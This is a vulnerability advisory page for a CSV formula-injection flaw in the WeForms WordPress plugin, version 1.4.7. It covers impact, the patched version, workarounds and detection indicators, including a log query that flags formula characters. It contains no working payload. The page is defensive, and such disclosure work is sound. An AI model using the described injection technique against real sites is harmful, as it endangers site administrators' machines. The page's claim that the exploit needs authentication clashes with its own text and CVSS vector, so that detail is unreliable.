Login Sign Up

CVE-2020-22276

9.8 CRITICAL

📋 TL;DR

CVE-2020-22276 is a CSV injection vulnerability in the WeForms WordPress plugin version 1.4.7 that allows attackers to inject malicious formulas into exported CSV files. When administrators export form entries containing attacker-controlled data, opening the CSV in spreadsheet software can execute arbitrary commands. This affects WordPress sites using the vulnerable WeForms plugin version.

💻 Affected Systems

Products:
  • WeForms WordPress Plugin
Versions: 1.4.7
Operating Systems: Any OS running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Requires the plugin to be installed and active with form entry export functionality accessible.

📦 What is this software?

Weforms by Weformspro

View all CVEs affecting Weforms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could execute arbitrary commands on administrator workstations when they open malicious CSV exports, potentially leading to full system compromise, data theft, or ransomware deployment.

🟠

Likely Case

Attackers inject malicious formulas that execute when administrators open CSV exports in Excel or similar software, potentially stealing credentials or installing malware.

🟢

If Mitigated

With proper security controls like disabling automatic formula execution in spreadsheets and limiting plugin access, impact is reduced to data manipulation without code execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires attacker to submit malicious form data and administrator to export and open CSV. No authentication bypass needed for form submission.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.4.8 or later

Vendor Advisory: https://wordpress.org/plugins/weforms/#developers

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find WeForms plugin. 4. Click 'Update Now' if available. 5. Alternatively, download latest version from WordPress repository and manually update.

🔧 Temporary Workarounds

Disable CSV export functionality

all

Remove or restrict access to form entry export features in WeForms plugin settings

Configure spreadsheet software security

all

Disable automatic formula execution in Excel/LibreOffice/Google Sheets

🧯 If You Can't Patch

  • Restrict WeForms plugin access to trusted administrators only
  • Implement web application firewall rules to block CSV injection payloads

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > Installed Plugins for WeForms version 1.4.7

Check Version:

wp plugin list --name=weforms --field=version

Verify Fix Applied:

Verify WeForms plugin version is 1.4.8 or higher after update

📡 Detection & Monitoring

Log Indicators:

  • Unusual form submissions with formula characters (=, +, -, @)
  • Multiple CSV export requests from single IP

Network Indicators:

  • HTTP POST requests to /wp-admin/admin-ajax.php with weforms_export_entries action

SIEM Query:

source="wordpress.log" AND ("weforms_export_entries" OR "CSV export") AND ("=" OR "+" OR "-" OR "@")

📊 Metadata

CVE ID: CVE-2020-22276
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-1236
Published: November 4, 2020
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-22276, you might also want to check these:

CVE-2022-45360 9.8

This vulnerability allows CSV injection attacks in the WordPress Commenter Emails plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-45810 9.8

This CVE describes a CSV injection vulnerability in the Icegram Express WordPress plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-46803 9.8

This vulnerability allows unauthenticated attackers to inject malicious formulas into CSV files expo...

Same vulnerability type (CWE-1236)